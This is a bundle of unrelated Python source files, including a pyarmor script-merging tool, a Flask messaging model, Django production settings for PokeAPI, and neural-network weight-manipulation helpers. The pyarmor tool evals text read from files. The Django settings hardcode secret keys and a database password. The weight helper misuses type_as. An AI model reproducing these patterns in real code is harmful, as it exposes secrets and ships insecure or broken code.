start, stop, stride = key.indices(m)
for i in range(start, stop, stride):
res.append(self._get_geom_item(i))
return type(self.__p__)(res or None)
else:
raise TypeError("key must be an index or slice")
@property
def _longest(self):
max = 0
for g in iter(self):
l = len(g.coords)
if l > max:
max = l
class HeterogeneousGeometrySequence(GeometrySequence):
"""
Iterative access to a heterogeneous sequence of geometries.
"""
def __init__(self, parent):
super(HeterogeneousGeometrySequence, self).__init__(parent, None)
def _get_geom_item(self, i):
sub = lgeos.GEOSGetGeometryN(self._geom, i)
g = geom_factory(sub, parent=self)
g._other_owned = True
return g
class EmptyGeometry(BaseGeometry):
def __init__(self):
"""Create an empty geometry."""
BaseGeometry.__init__(self)
def _test():
"""Test runner"""
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
|
the-stack_106_13031
|
'''This tool is used to merge the scripts obfuscated by different
Python versions into one obfuscated script.
For example,
1. First obfuscate the scripts by Python 2.7
python2.7 pyarmor.py obfuscate -O py27 foo.py
2. Then obfuscate the scripts by Python 3.8
python3.8 pyarmor.py obfuscate -O py38 foo.py
3. Run this tool to merge all of them to path `merged_dist`
python merge.py py38/ py27/
If also possible to merge one script, for example:
python merge.py py27/foo.py py36/foo.py py35/foo.py
'''
import argparse
import logging
import os
import shutil
import struct
import sys
logger = logging.getLogger('merge')
def is_pyscript(filename):
return os.path.splitext(filename)[-1].lower() in ('.py', '.pyw')
def makedirs(path, exist_ok=False):
if not (exist_ok and os.path.exists(path)):
if path:
os.makedirs(path)
def parse_script(filename):
n = 0
with open(filename) as f:
for s in f.readlines():
if s.startswith('__pyarmor') or s.startswith('pyarmor('):
fs = s[s.find('__file__'):s.rfind(')')].split(', ')
code = eval(fs[-2])
flag = int(fs[-1])
break
n += 1
else:
return None, None, None, None
left_size = len(code)
offset = 0
infos = []
valid = False
while left_size > 0:
pymajor, pyminor = struct.unpack("BB", code[offset+9:offset+11])
size, = struct.unpack("i", code[offset+56:offset+60])
if not size:
valid = True
size = left_size
left_size -= size
infos.append([offset, size, (pymajor, pyminor)])
offset += size
if not valid:
raise RuntimeError('Invalid header in this script')
return n, flag, code, infos
def merge_scripts(scripts, output):
refscript = scripts.pop(0)
logger.info('Parse reference script %s', refscript)
refn, reflag, refcode, refinfos = parse_script(refscript)
if refcode is None:
logger.info('Ignore this script, it is not obfuscated')
return
merged_vers = []
pieces = []
for script in reversed(scripts):
logger.info('Parse script %s', script)
n, flag, code, pyinfos = parse_script(script)
if code is None:
raise RuntimeError('This script is not an obfuscated script')
if reflag != flag:
raise RuntimeError('The script "%s" is obfuscated with '
'different way' % script)
if len(pyinfos) > 1:
raise RuntimeError('The script "%s" is merged script' % script)
ver = pyinfos[0][-1]
logger.debug('\tFound Python %d.%d', *ver)
if ver in merged_vers:
logging.warning('\tIngore this Python %d.%d', *ver)
continue
logger.debug('\tMerge this Python %d.%d', *ver)
merged_vers.append(ver)
pieces.extend([code[:56], struct.pack("i", len(code)), code[60:]])
logger.debug('Handle reference script %s', refscript)
for offset, size, ver in refinfos:
logger.debug('\tFound Python %d.%d', *ver)
if ver in merged_vers:
logger.debug('\tIgnore this Python %d.%d', *ver)
continue
logger.debug('\tMerge this Python %d.%d', *ver)
merged_vers.append(ver)
pieces.append(refcode[offset:offset+size])
scode = '\\x' + '\\x'.join(['%02x' % c
for c in bytearray(b''.join(pieces))])
with open(scripts[0]) as f:
lines = f.readlines()
s = lines[refn]
i = s.find(', b')
j = s.rfind(',')
lines[refn] = s[:i+4] + scode + s[j-1:]
logger.info('Write merged script: %s', output)
for ver in merged_vers:
logger.info('\t* Python %d.%d', *ver)
makedirs(os.path.dirname(output), exist_ok=True)
with open(output, 'w') as f:
f.write(''.join(lines))
def merge_runtimes(paths, output):
runtimes = []
pyvers = []
refpath = os.path.normpath(paths[-1])
n = len(refpath) + 1
for root, dirs, files in os.walk(refpath):
if os.path.basename(root).startswith('pytransform'):
runtimes.append(root[n:])
for x in files:
if x.startswith('pytransform'):
runtimes.append(os.path.join(root, x)[n:])
elif is_pyscript(x) and not pyvers:
name = os.path.join(root, x)[n:]
for p in paths:
pyinfos = parse_script(os.path.join(p, name))[-1]
if pyinfos is None:
pyvers = []
break
if len(pyinfos) > 1:
raise RuntimeError('The runtime file in %s is merged'
% p)
pyvers.append(pyinfos[0][-1])
logger.debug('Found runtimes: %s', runtimes)
if not runtimes:
raise RuntimeError('No runtime files found')
elif len(runtimes) > 1:
raise RuntimeError('Too many runtime files')
logger.debug('Found python versions: %s', pyvers)
if not pyvers:
raise RuntimeError('Could not get python version of runtime files')
r = os.path.join(refpath, runtimes[0])
if os.path.isdir(r):
logger.info('Copy non-super mode runtime package %s', r)
dst = os.path.join(output, runtimes[0])
logger.info('To %s', dst)
makedirs(os.path.dirname(dst), exist_ok=True)
shutil.copytree(r, dst)
return
pkgname = os.path.basename(r).rsplit('.', 1)[0]
pkgpath = os.path.join(output, pkgname)
makedirs(pkgpath, exist_ok=True)
src = os.path.join(pkgpath, '__init__.py')
logger.info('Create super runtime package: %s', src)
with open(src, 'w') as f:
f.write(
"import sys\n"
"sys.modules[__name__].__dict__.update("
"__import__('.'.join("
"[__name__, 'py%s%s' % sys.version_info[:2], __name__]),"
" globals(), locals(), ['*']).__dict__)"
)
for p, (major, minor) in zip(paths, pyvers):
src = os.path.join(p, runtimes[0])
dst = os.path.join(pkgpath, 'py%s%s' % (major, minor))
logger.info('Copy %s to %s', src, dst)
makedirs(dst, exist_ok=True)
shutil.copy2(src, dst)
logger.debug('Create package file "%s/__init__.py"', dst)
with open(os.path.join(dst, '__init__.py'), 'w') as f:
f.write('')
def find_scripts(paths):
names = []
refpath = os.path.normpath(paths[-1])
logger.info('Find scripts in the path %s', refpath)
n = len(refpath) + 1
for root, dirs, files in os.walk(refpath):
for x in files:
if not is_pyscript(x):
continue
scripts = [os.path.join(root, x)]
names.append(scripts[0][n:])
return names
def excepthook(type, exc, traceback):
try:
msg = exc.args[0] % exc.args[1:]
except Exception:
msg = str(exc)
logging.error(msg)
sys.exit(1)
def main():
parser = argparse.ArgumentParser(
prog='pyarmor merge',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=__doc__)
parser.add_argument('-O', '--output',
default='merged_dist',
help='Default output path: %(default)s)')
parser.add_argument('-d', '--debug',
default=False,
action='store_true',
dest='debug',
help='print debug log (default: %(default)s)')
parser.add_argument('path', nargs='+',
help="Path or obfuscated script")
args = parser.parse_args(sys.argv[1:])
if args.debug:
logger.setLevel(logging.DEBUG)
else:
sys.excepthook = excepthook
logger.info('Merge %s...', str(args.path)[1:-1])
output = args.output
if os.path.isfile(args.path[0]):
output = output if is_pyscript(output) \
else os.path.join(output, os.path.basename(args.path[0]))
merge_scripts(args.path, output)
else:
if output and is_pyscript(output):
raise RuntimeError('--output must be a path when mergeing path')
logging.info('Merging obfuscated scripts...')
for name in find_scripts(args.path):
merge_scripts([os.path.join(p, name) for p in args.path],
os.path.join(output, name))
logging.info('Merging obfuscated scripts OK')
logging.info('Merging runtime files...')
merge_runtimes(args.path, output)
logging.info('Merging runtime files OK')
logger.info('Merge all the scripts to %s successfully', output)
if __name__ == '__main__':
logging.basicConfig(
level=logging.INFO,
format='%(levelname)-8s %(message)s',
)
main()
|
the-stack_106_13032
|
# -*- coding: utf-8 -*-
"""Yo model"""
from bson import DBRef
from datetime import datetime
from flask_mongoengine import Document
from mongoengine import (BooleanField, StringField, LongField, ListField,
GeoPointField, PULL, DictField)
from .header import Header
from .helpers import URLField, DocumentMixin, ReferenceField
from .user import User
from .yo_token import YoToken
from ..constants.yos import STATUS_PRIORITY_MAP
from yoapi.models import oauth
from yoapi.models.region import Region
class Yo(DocumentMixin, Document):
"""MongoDB Yo model."""
meta = {'collection': 'yo',
'indexes': ['recipient',
{'fields': ['photo'], 'sparse': True},
{'fields': ['is_favorite'], 'sparse': True},
{'fields': ['scheduled_for'], 'sparse': True},
{'fields': ['reply_to'], 'sparse': True},
('scheduled_for', 'status'),
('sender', 'created'),
('recipient', 'created'),
('sender', 'recipient', 'created'),
('recipient', 'sender', 'created')],
'auto_create_index': False}
not_on_yo = None
# The user sending the Yo.
sender = ReferenceField(User)
# DEPRECATED: The users receiving the yos
recipients = ListField(ReferenceField(User), default=None)
# DEPRECATED: The child yos associated with this
# This should only have been used with welcome links
children = ListField(ReferenceField('self', reverse_delete_rule=PULL),
default=None)
# The user receiving the yo
recipient = ReferenceField(User, default=None)
# If this Yo is a reply, this is the original Yo
reply_to = ReferenceField('self', reverse_delete_rule=PULL, default=None)
# The OAuth client used to sent this Yo, can be None if sent from our clients.
oauth_client = ReferenceField(oauth.Client, default=None)
# Recipient count.
recipient_count = LongField()
# Boolean indicator for group type.
is_group_yo = BooleanField()
# Boolean indicator if the yo was favorited.
is_favorite = BooleanField()
is_poll = BooleanField()
is_push_only = BooleanField()
duration_in_minutes = LongField()
# Boolean indicator for broadcast type.
broadcast = BooleanField()
# Optional location from which Yo was sent.
location = GeoPointField()
# The city of which the location refers to.
location_city = StringField()
# Optional max 30 chars of text.
text = StringField()
# Optional max 30 chars of additional information.
context = StringField()
# Optional link to be opened on tapping left button. StringField because sms: link is a valid link
left_link = StringField()
# Optional link to be opened on tapping right button. StringField because sms: link is a valid link
right_link = StringField()
# Optional link attachment.
link = URLField()
# Optional link for thumbnail.
thumbnail_url = URLField()
# Optional photo.
photo = ReferenceField('Image')
# Optional cover image (Yo Byte).
cover = ReferenceField('Image')
# content type returned by a head request to the link
link_content_type = StringField()
# Optional parent Yo. This should be set by e.g. welcome links.
parent = ReferenceField('self')
# Optional origin Yo. This should be set by when forwarding a yo.
origin_yo = ReferenceField('self')
# Boolean indicator for location
sent_location = BooleanField()
# Recipient count.
sent_count = LongField()
# Optional link attachment.
short_link = URLField()
# Optional link attachment.
sound = StringField()
# String field to specify status
status = StringField()
# reference for what header to use for the payload
header = ReferenceField(Header)
# usec field indicating what time this yo is scheduled for
scheduled_for = LongField()
# denotes which schedule this belongs to
schedule_name = StringField()
# The token used to send this yo.
yo_token = ReferenceField(YoToken, default=None)
# For localized Yos
region = ReferenceField(Region, default=None)
# The context id this was sent from (provided by client).
context_id = StringField()
# The two available responses for the Yo in the format: "left.title" i.e "nope.yep"
response_pair = StringField()
question = StringField()
left_replies_count = LongField()
right_replies_count = LongField()
left_share_template = StringField()
right_share_template = StringField()
left_reply = StringField()
right_reply = StringField()
user_info = DictField()
app_id = StringField()
# The two available responses for the Yo in the format: "left.title" i.e "nope.yep"
sent_add_response_preflight_push = BooleanField()
def __str__(self):
return 'id=%s' % self.yo_id
def save(self):
if not self.created_date:
self.created_date = datetime.now()
return super(Yo, self).save()
def has_children(self):
return self.broadcast or self.is_group_yo or self.recipients and len(self.recipients) > 1
def has_content(self):
flattened_yo = self.get_flattened_yo()
if flattened_yo.location:
return True
if flattened_yo.link:
return True
if flattened_yo.photo:
return True
if flattened_yo.cover:
return True
return False
def should_trigger_response(self):
# Never trigger a response when sending to multiple recipients
if self.has_children():
return False
# If there is no recipient no need to go further
if not self.recipient:
return False
# If there is a callback to be triggered no need to go further
if self.recipient.callback:
return False
# Prevent possible callback loops
if self.sender and self.sender == self.recipient:
return False
# Never trigger a callback if yo has a parent
# This prevents broadcasts as well as welcome links
if self.parent:
return False
# If the recipient is not in the store don't allow a response
if not self.recipient.in_store:
return False
return True
def should_trigger_callback(self):
if self.reply_to:
if self.reply_to.parent:
return self.reply_to.parent.sender.callback or self.reply_to.parent.sender.callbacks
else:
return self.reply_to.sender.callback or self.reply_to.sender.callbacks
# If there is no callback to be triggered no need to go further
if not self.recipient:
return False
# If there is no callback to be triggered no need to go further
if not self.recipient.callback:
return False
# Never trigger a callback during a broadcast
if self.broadcast:
return False
# Prevent possible callback loops
if self.sender and self.sender == self.recipient:
return False
if self.parent:
# Never trigger a callback if yo has a parent
# This prevents broadcasts as well as welcome links
return False
return True
def should_trigger_oauth_callback(self):
# Only perform callbacks for Yos that are replies to the originating oauth client
if not self.reply_to:
return False
if not self.reply_to.oauth_client:
return False
# If there is no callback to be triggered no need to go further
if self.reply_to.oauth_client and not self.reply_to.oauth_client.callback_url:
return False
# Prevent possible callback loops
if self.sender and self.sender == self.recipient:
return False
if self.parent:
# Never trigger a callback if yo has a parent
# This prevents broadcasts as well as welcome links
return False
return True
@property
def yo_id(self):
return str(self.id) if self.id else None
@classmethod
def priority_for_status(cls, status):
return STATUS_PRIORITY_MAP.get(status, -1)
@property
def is_read(self):
read_priority = self.priority_for_status('read')
status_priority = self.priority_for_status(self.status)
return status_priority >= read_priority
@property
def is_received(self):
received_priority = self.priority_for_status('received')
status_priority = self.priority_for_status(self.status)
return status_priority >= received_priority
def get_type(self):
yo_type = ''
flattened_yo = self.get_flattened_yo()
if flattened_yo.link:
yo_type = 'link'
if flattened_yo.location:
yo_type = 'location'
if flattened_yo.photo:
yo_type = 'photo'
if (flattened_yo.link_content_type and
flattened_yo.link_content_type.startswith('image')):
yo_type = 'photo'
return yo_type
def get_flattened_yo(self):
flattened_yo = FlattenedYo()
flattened_yo.origin_yo_id = self.yo_id
flattened_yo.origin_sender = None
flattened_yo.location_str = None
flattened_yo.parent_yo_id = None
flattened_yo.group = None
if self.recipient and self.recipient.is_group:
flattened_yo.group = self.recipient
# NOTE: mogoengine.Document iterators use the private field
# _fields_ordered so that you don't need to worry about
# callables and other private attrs
for attr in self:
setattr(flattened_yo, attr, getattr(self, attr))
if self.parent and self.parent.has_children():
flattened_yo.parent_yo_id = self.parent.yo_id
if self.parent.recipient and self.parent.recipient.is_group:
flattened_yo.group = self.parent.recipient
# Only set values from the parent if they aren't already set
# in the child
if not flattened_yo.origin_yo:
flattened_yo.origin_yo_id = self.parent.yo_id
for attr in self.parent:
if not getattr(flattened_yo, attr):
setattr(flattened_yo, attr, getattr(self.parent, attr))
if flattened_yo.location:
flattened_yo.location_str = '%s;%s' % (flattened_yo.location[0],
flattened_yo.location[1])
if (flattened_yo.origin_yo and flattened_yo.origin_yo.parent and
flattened_yo.origin_yo.parent.has_children()):
flattened_yo.origin_yo = flattened_yo.origin_yo.parent
if flattened_yo.origin_yo:
flattened_yo.origin_yo_id = flattened_yo.origin_yo.yo_id
flattened_yo.origin_sender = flattened_yo.origin_yo.sender
flattened_yo.yo_id = self.yo_id
flattened_yo.left_link = self.left_link
flattened_yo.right_link = self.right_link
# A link and photo should never exist at the same time
# So overidding the link here should be fine.
if flattened_yo.photo:
flattened_yo.link = flattened_yo.photo.make_full_url()
flattened_yo.short_link = flattened_yo.photo.short_link
return flattened_yo
def get_flattened_dict(self):
flattened_yo = self.get_flattened_yo()
origin_sender = None
if flattened_yo.origin_sender:
origin_sender = flattened_yo.origin_sender.username
recipient = None
if flattened_yo.recipient:
recipient = flattened_yo.recipient.username
cover = None
if flattened_yo.cover:
cover = flattened_yo.cover.make_full_url()
flattened_dict = {
'broadcast': flattened_yo.broadcast,
'cover': cover,
'created_at': flattened_yo.created,
'is_favorite': bool(flattened_yo.is_favorite),
'is_group_yo': bool(flattened_yo.is_group_yo),
'is_read': self.is_read,
'is_received': self.is_received,
'link': flattened_yo.link,
'location': flattened_yo.location_str,
'origin_sender': origin_sender,
'origin_yo_id': flattened_yo.origin_yo_id,
'recipient': recipient,
'recipient_count': flattened_yo.recipient_count,
'sender': flattened_yo.sender.username,
'short_link': flattened_yo.short_link,
'status': flattened_yo.status,
'yo_id': flattened_yo.yo_id}
return flattened_dict
def get_sender(self, safe=False):
"""Get the sender from the parent if needed.
params:
safe - Returns a new yoapi.models.User instead of None
"""
sender = self.sender
if sender:
return sender
parent = self.parent
if parent:
sender = parent.sender
if safe and not sender:
sender = User()
return sender
def get_friend(self, user, safe=False):
"""Get the user whom sent or received this Yo that is not
the supplied user.
params:
user - a valid yoapi.models.User object
safe - Returns a new yoapi.models.User instead of None
"""
sender = self.get_sender()
recipient = self.recipient
if user == sender:
friend = recipient
elif user == recipient:
friend = sender
else:
friend = None
if safe and isinstance(self.sender, (None.__class__, DBRef)):
if isinstance(friend, DBRef):
friend = User(id=friend.value)
else:
friend = User()
return friend
def get_status_dict(self, user=None):
flattened_yo = self.get_flattened_yo()
original_status = flattened_yo.status
# If the yo has content dismissed means they truly didn't read it.
if self.has_content() and original_status == 'dismissed':
original_status = 'received'
# If a yo does not have content as long as it was dismissed it was
# still read.
status_map = {'received': 'delivered',
'dismissed': 'read',
'read': 'read',
'pending': 'sent',
'sent': 'sent'}
# It is safest to assume any other status as sent.
status = status_map.get(original_status, 'sent')
# If the current yo was sent by someone other than the specified user
# mark it as delivered.
status = status if flattened_yo.sender == user else 'received'
# The username to be returned is the opposite of the specified user.
if user != flattened_yo.sender:
username = flattened_yo.sender.username
user_id = flattened_yo.sender.user_id
elif flattened_yo.recipient:
username = flattened_yo.recipient.username
user_id = flattened_yo.recipient.user_id
else:
# This should only happen with legacy group yos.
return None
status_dict = {
'status': status,
'original_status': flattened_yo.status,
'username': username,
'user_id': user_id,
'yo_id': flattened_yo.yo_id,
'type': self.get_type(),
'time': flattened_yo.updated or flattened_yo.created
}
parent = flattened_yo.parent if flattened_yo.parent else flattened_yo
group = parent.recipient
if flattened_yo.is_group_yo and group and group.is_group:
status_dict.update({'group_username': group.username,
'group_user_id': group.user_id})
return status_dict
def has_dbrefs(self):
"""Checks if there are any users that could not be
dereferenced"""
if isinstance(self, DBRef):
return True
if isinstance(self.sender, DBRef):
return True
if isinstance(self.recipient, DBRef):
return True
if isinstance(self.parent, DBRef):
return True
if self.parent and isinstance(self.parent.sender, DBRef):
return True
if self.parent and isinstance(self.parent.recipient, DBRef):
return True
return False
class FlattenedYo(object):
"""Psuedo class used when flattening a yo"""
pass
|
the-stack_106_13036
|
# Kth Smallest Element in a Sorted Matrix: https://leetcode.com/problems/kth-smallest-element-in-a-sorted-matrix/
# Given an n x n matrix where each of the rows and columns are sorted in ascending order, return the kth smallest element in the matrix.
# Note that it is the kth smallest element in the sorted order, not the kth distinct element.
# The almost optimal that is neat is using a heap to simple keep adding elements of each list and then
# moving through n times which is pretty optimal in o(min(K,n) + klogn) and o(min(k, n)) space
# For this problem the optimal solution is a binary search algo where you check if the middle value has k elements below it
# I will be focusing on this as the heap solution takes all of 5 min to code but the binary search is a lot harder
class Solution:
def countLessThanMid(self, matrix, mid, smaller, larger):
count, n = 0, len(matrix)
row, col = n - 1, 0
while row >= 0 and col < n:
if matrix[row][col] > mid:
larger = min(larger, matrix[row][col])
row -= 1
else:
smaller = max(smaller, matrix[row][col])
count += row + 1
col += 1
return count, smaller, larger
def kthSmallest(self, matrix, k: int) -> int:
n = len(matrix)
# Garunteed to be square
# So this is a basic binary search but we use the value instead of the index to find
# correct element
start, end = matrix[0][0], matrix[n-1][n-1]
while start < end:
mid = start + (end - start) / 2
smaller, larger = matrix[0][0], matrix[n-1][n-1]
count, smaller, larger = self.countLessThanMid(
matrix, mid, smaller, larger)
if count == k:
return smaller
elif count < k:
start = larger
else:
end = smaller
return start
# Score Card
# Did I need hints? Yes
# Did you finish within 30 min? 28
# Was the solution optimal? This is optimal
# Were there any bugs? No
# 3 5 5 5 = 4.5
|
the-stack_106_13038
|
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
"""Simple test script for 1.54" 152x152 tri-color display.
Supported products:
* Adafruit 1.54" Tri-Color Display Breakout
* https://www.adafruit.com/product/3625
"""
import time
import board
import displayio
import adafruit_il0373
displayio.release_displays()
# This pinout works on a Feather M4 and may need to be altered for other boards.
spi = board.SPI() # Uses SCK and MOSI
epd_cs = board.D9
epd_dc = board.D10
epd_reset = board.D5
epd_busy = board.D6
display_bus = displayio.FourWire(
spi, command=epd_dc, chip_select=epd_cs, reset=epd_reset, baudrate=1000000
)
time.sleep(1)
display = adafruit_il0373.IL0373(
display_bus, width=152, height=152, busy_pin=epd_busy, highlight_color=0xFF0000
)
g = displayio.Group()
f = open("/display-ruler.bmp", "rb")
pic = displayio.OnDiskBitmap(f)
t = displayio.TileGrid(pic, pixel_shader=displayio.ColorConverter())
g.append(t)
display.show(g)
display.refresh()
print("refreshed")
time.sleep(120)
|
the-stack_106_13040
|
import os
import pytest
import requests_mock
from audiomate import corpus
from audiomate.corpus import io
from audiomate.corpus.io import rouen
from tests import resources
from . import reader_test as rt
@pytest.fixture
def downloader():
return io.RouenDownloader()
@pytest.fixture()
def zip_data():
with open(resources.get_resource_path(['sample_files', 'zip_sample_with_subfolder.zip']), 'rb') as f:
return f.read()
class TestRouenDownloader:
def test_download(self, zip_data, downloader, tmpdir):
target_folder = tmpdir.strpath
with requests_mock.Mocker() as mock:
mock.get(rouen.DATA_URL, content=zip_data)
downloader.download(target_folder)
assert os.path.isfile(os.path.join(target_folder, 'a.txt'))
assert os.path.isfile(os.path.join(target_folder, 'subsub', 'b.txt'))
assert os.path.isfile(os.path.join(target_folder, 'subsub', 'c.txt'))
class TestRouenReader(rt.CorpusReaderTest):
SAMPLE_PATH = resources.sample_corpus_path('rouen')
FILE_TRACK_BASE_PATH = SAMPLE_PATH
EXPECTED_NUMBER_OF_TRACKS = 4
EXPECTED_TRACKS = [
rt.ExpFileTrack('avion1', 'avion1.wav'),
rt.ExpFileTrack('avion2', 'avion2.wav'),
rt.ExpFileTrack('bus1', 'bus1.wav'),
rt.ExpFileTrack('metro_rouen22', 'metro_rouen22.wav'),
]
EXPECTED_NUMBER_OF_ISSUERS = 0
EXPECTED_NUMBER_OF_UTTERANCES = 4
EXPECTED_UTTERANCES = [
rt.ExpUtterance('avion1', 'avion1', None, 0, float('inf')),
rt.ExpUtterance('avion2', 'avion2', None, 0, float('inf')),
rt.ExpUtterance('bus1', 'bus1', None, 0, float('inf')),
rt.ExpUtterance('metro_rouen22', 'metro_rouen22', None, 0, float('inf')),
]
EXPECTED_LABEL_LISTS = {
'avion1': [rt.ExpLabelList(corpus.LL_SOUND_CLASS, 1)],
'avion2': [rt.ExpLabelList(corpus.LL_SOUND_CLASS, 1)],
'bus1': [rt.ExpLabelList(corpus.LL_SOUND_CLASS, 1)],
'metro_rouen22': [rt.ExpLabelList(corpus.LL_SOUND_CLASS, 1)],
}
EXPECTED_LABELS = {
'avion1': [rt.ExpLabel(corpus.LL_SOUND_CLASS, 'avion', 0, float('inf'))],
'avion2': [rt.ExpLabel(corpus.LL_SOUND_CLASS, 'avion', 0, float('inf'))],
'bus1': [rt.ExpLabel(corpus.LL_SOUND_CLASS, 'bus', 0, float('inf'))],
'metro_rouen22': [rt.ExpLabel(corpus.LL_SOUND_CLASS, 'metro_rouen', 0, float('inf'))],
}
EXPECTED_NUMBER_OF_SUBVIEWS = 0
def load(self):
return io.RouenReader().load(self.SAMPLE_PATH)
|
the-stack_106_13042
|
# Production settings
import os
from unipath import Path
PROJECT_ROOT = Path(__file__).ancestor(2)
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (("Paul Hallett", "[email protected]"),)
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
MANAGERS = ADMINS
BASE_URL = "http://pokeapi.co"
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = [".pokeapi.co", "localhost", "127.0.0.1"]
TIME_ZONE = "Europe/London"
LANGUAGE_CODE = "en-gb"
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Explicitly define test runner to avoid warning messages on test execution
TEST_RUNNER = "django.test.runner.DiscoverRunner"
SECRET_KEY = "4nksdock439320df*(^x2_scm-o$*py3e@-awu-n^hipkm%2l$sw$&2l#"
MIDDLEWARE = [
"corsheaders.middleware.CorsMiddleware",
"django.middleware.common.CommonMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "config.urls"
WSGI_APPLICATION = "config.wsgi.application"
DATABASES = {
"default": {
"ENGINE": "django.db.backends.postgresql_psycopg2",
"NAME": "pokeapi_co_db",
"USER": "root",
"PASSWORD": "pokeapi",
"HOST": "localhost",
"PORT": "",
"CONN_MAX_AGE": 30,
}
}
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
},
}
}
SECRET_KEY = os.environ.get(
"SECRET_KEY", "ubx+22!jbo(^x2_scm-o$*py3e@-awu-n^hipkm%2l$sw$&2l#"
)
CUSTOM_APPS = (
"tastypie",
"pokemon_v2",
)
INSTALLED_APPS = (
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.admin",
"django.contrib.humanize",
"corsheaders",
"rest_framework",
"cachalot",
) + CUSTOM_APPS
API_LIMIT_PER_PAGE = 1
TASTYPIE_DEFAULT_FORMATS = ["json"]
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_METHODS = "GET"
CORS_URLS_REGEX = r"^/api/.*$"
REST_FRAMEWORK = {
"DEFAULT_RENDERER_CLASSES": ("drf_ujson.renderers.UJSONRenderer",),
"DEFAULT_PARSER_CLASSES": ("drf_ujson.renderers.UJSONRenderer",),
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.LimitOffsetPagination",
"PAGE_SIZE": 20,
"PAGINATE_BY": 20,
}
|
the-stack_106_13043
|
# -*- coding: utf-8 -*-
import tkinter as tk
import tkinter.font as tk_font
from thonny import get_workbench, ui_utils
from thonny.common import ValueInfo
from thonny.ui_utils import TreeFrame
MAX_REPR_LENGTH_IN_GRID = 100
def format_object_id(object_id):
# this format aligns with how Python shows memory addresses
if object_id is None:
return None
else:
return "0x" + hex(object_id)[2:].upper() # .rjust(8,'0')
def parse_object_id(object_id_repr):
return int(object_id_repr, base=16)
class MemoryFrame(TreeFrame):
def __init__(self, master, columns):
TreeFrame.__init__(self, master, columns)
font = tk_font.nametofont("TkDefaultFont").copy()
font.configure(underline=True)
self.tree.tag_configure("hovered", font=font)
def stop_debugging(self):
self._clear_tree()
def show_selected_object_info(self):
iid = self.tree.focus()
if iid != "":
# NB! Assuming id is second column!
id_str = self.tree.item(iid)["values"][1]
if id_str in ["", None, "None"]:
return
object_id = parse_object_id(id_str)
get_workbench().event_generate("ObjectSelect", object_id=object_id)
class VariablesFrame(MemoryFrame):
def __init__(self, master):
MemoryFrame.__init__(self, master, ("name", "id", "value"))
self.tree.column("name", width=120, anchor=tk.W, stretch=False)
self.tree.column("id", width=450, anchor=tk.W, stretch=True)
self.tree.column("value", width=450, anchor=tk.W, stretch=True)
self.tree.heading("name", text=_("Name"), anchor=tk.W)
self.tree.heading("id", text=_("Value ID"), anchor=tk.W)
self.tree.heading("value", text=_("Value"), anchor=tk.W)
get_workbench().bind("ShowView", self._update_memory_model, True)
get_workbench().bind("HideView", self._update_memory_model, True)
self._update_memory_model()
self.tree.tag_configure(
"group_title",
font="BoldTkDefaultFont",
background=ui_utils.lookup_style_option(".", "background"),
)
def destroy(self):
MemoryFrame.destroy(self)
get_workbench().unbind("ShowView", self._update_memory_model)
get_workbench().unbind("HideView", self._update_memory_model)
def _update_memory_model(self, event=None):
if get_workbench().in_heap_mode():
self.tree.configure(displaycolumns=("name", "id"))
# self.tree.columnconfigure(1, weight=1, width=400)
# self.tree.columnconfigure(2, weight=0)
else:
self.tree.configure(displaycolumns=("name", "value"))
# self.tree.columnconfigure(1, weight=0)
# self.tree.columnconfigure(2, weight=1, width=400)
def update_variables(self, all_variables):
self._clear_tree()
if not all_variables:
return
if isinstance(all_variables, list):
groups = all_variables
else:
groups = [("", all_variables)]
for group_title, variables in groups:
if group_title:
node_id = self.tree.insert("", "end", tags=("group_title",))
self.tree.set(node_id, "name", group_title)
for name in sorted(variables.keys()):
if not name.startswith("__"):
node_id = self.tree.insert("", "end", tags="item")
self.tree.set(node_id, "name", name)
if isinstance(variables[name], ValueInfo):
description = variables[name].repr
id_str = variables[name].id
else:
description = variables[name]
id_str = None
self.tree.set(node_id, "id", format_object_id(id_str))
self.tree.set(node_id, "value", description)
def on_select(self, event):
self.show_selected_object_info()
|
the-stack_106_13044
|
"""
Manipulate network parameters and setup random directions with normalization.
"""
import torch
import copy
from os.path import exists, commonprefix
import h5py
import h5_util
import model_loader
################################################################################
# Supporting functions for weights manipulation
################################################################################
def get_weights(net):
""" Extract parameters from net, and return a list of tensors"""
return [p.data for p in net.parameters()]
def set_weights(net, weights, directions=None, step=None):
"""
Overwrite the network's weights with a specified list of tensors
or change weights along directions with a step size.
"""
if directions is None:
# You cannot specify a step length without a direction.
for (p, w) in zip(net.parameters(), weights):
p.data.copy_(w.type_as(p.data.dtype))
else:
assert step is not None, 'If a direction is specified then step must be specified as well'
if len(directions) == 2:
dx = directions[0]
dy = directions[1]
changes = [d0*step[0] + d1*step[1] for (d0, d1) in zip(dx, dy)]
else:
changes = [d*step for d in directions[0]]
for (p, w, d) in zip(net.parameters(), weights, changes):
p.data = w + torch.Tensor(d).type_as(w.dtype)
def set_states(net, states, directions=None, step=None):
"""
Overwrite the network's state_dict or change it along directions with a step size.
"""
if directions is None:
net.load_state_dict(states)
else:
assert step is not None, 'If direction is provided then the step must be specified as well'
if len(directions) == 2:
dx = directions[0]
dy = directions[1]
changes = [d0*step[0] + d1*step[1] for (d0, d1) in zip(dx, dy)]
else:
changes = [d*step for d in directions[0]]
